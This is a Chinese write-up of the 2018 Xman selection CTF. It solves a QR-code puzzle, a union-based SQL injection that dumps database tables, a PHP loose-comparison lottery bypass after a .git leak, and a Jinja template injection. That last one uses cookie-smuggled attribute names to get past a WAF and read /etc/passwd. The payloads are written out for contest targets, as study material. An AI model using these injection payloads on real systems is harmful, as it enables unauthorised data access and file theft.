2018-Xman选拔赛(夏)
2018-07-15 本文已影响0人
ch3nie
(大佬们真的太强了,身为萌新的我。。。。哇的一声哭出来,只做出来四个,嘤嘤嘤)
...⁄(⁄ ⁄•⁄ω⁄•⁄ ⁄)⁄....
Xman选拔赛WP
MISC
X-MAN— A face
emmmmmP图,补全二维码,然后得到
KFBVIRT3KBZGK5DUPFPVG2LTORSXEX2XNBXV6QTVPFZV6TLFL5GG6YTTORSXE7I=
解密得到 flag
QCTF{Pretty_Sister_Who_Buys_Me_Lobster}
web
NewsCenter
打开题发现是一个注入
判断字段数,字段为3个字段,且2,3字段有回显
'or 1=1 order by 3#
'or 1=1 union select 1,2,3#
data:image/s3,"s3://crabby-images/88d9b/88d9b6005d349de539e7f323256a21b01b30538c" alt=""
获取库名information_schema,news,test
'or 1=1 union select 1,version(),group_concat(schema_name) from information_schema.schemata#
data:image/s3,"s3://crabby-images/9cb37/9cb378706e3371ee9ea570169994601027877ab4" alt=""
获取表名news,secret_table
'or 1=1 union select 1,version(),union select group_concat(table_name) from information_schema.tables where table_schema='news'#
data:image/s3,"s3://crabby-images/9f2eb/9f2eb3074651edd02bb9146a783085359185b8c5" alt=""
获取字段id,fl4g
'or 1=1 union select 1,version(),group_concat(column_name) from information_schema.columns where table_name='secret_table'#
拿到flag
'or 1=1 union select 1,version(),group_concat(fl4g) from secret_table#
data:image/s3,"s3://crabby-images/6db1d/6db1dd4e6ff6af7bad24af0a34c53fb6d6719a49" alt=""
QCTF{sq1_inJec7ion_ezzzzzz}
Lottery!
拿到题先尝试输入买了彩票试了一下,呃,未果
看了一下robots.txt发现Disallow: /.git/ 应该有git泄露???用GitHack把源码载下来
data:image/s3,"s3://crabby-images/69707/69707b719fcad7a3f551d8a57941bd8b11402841" alt=""
他的win_number是生成的随机数
data:image/s3,"s3://crabby-images/9e364/9e364c490f399853783d1d3f570437428aa0e2b8" alt=""
双等号 是弱类型相等,用数组[true,true,true,true,true,true,true] ,修改post过去的参数
data:image/s3,"s3://crabby-images/0423c/0423c98df7ae36c71f508fd40309dffdc660ff52" alt=""
然后emmmm中奖了,有钱了,可以买flag了(哇的一声哭出来~搞得我都想真买张彩票去了)
data:image/s3,"s3://crabby-images/6784f/6784f295ec5b11ac357fd5e93c09c3e779206804" alt=""
诺,你要的flag
QCTF{my_PhP_ski1l_is_weeak}
data:image/s3,"s3://crabby-images/293c2/293c27a0eae7d1b4973a8766928bac57df2aedaf" alt=""
Confusion1
刚开始看到404界面以为是题目done了 ,后来发现不是,404页面有hint,要想办法读文件
data:image/s3,"s3://crabby-images/f29d1/f29d1d6f7182990aeafb9c90d8217a8411ab401a" alt=""
尝试输入,404页面有会回显,SSTI
data:image/s3,"s3://crabby-images/b2222/b22226c117684acb1275370d507ba8e89a608504" alt=""
构造payload读取文件
data:image/s3,"s3://crabby-images/e7e95/e7e950f8150448c9ffca21eedbe6f401e757b9be" alt=""
emmmmmmm,有waf,过不去,想办法绕过,通过额外参数的方式绕过验证,把waf掉的值以cookie的形式传入
http://47.96.118.255:2333/{{''[request.cookies.a][request.cookies.b][2][request.cookies.c]()[40]('/etc/passwd')[request.cookies.d]()}}
data:image/s3,"s3://crabby-images/2ef6f/2ef6f20fca3c6835713e4a03b21211a3e650fc2c" alt="绕过"
把路径换成falg的,直接读取flag
QCTF{1_4m_c0nFu51ed_6y_PhPy7h000ooo000n}
data:image/s3,"s3://crabby-images/be9cd/be9cd821971c2dee0236cfcbe5f6b5505e81b40b" alt="flag"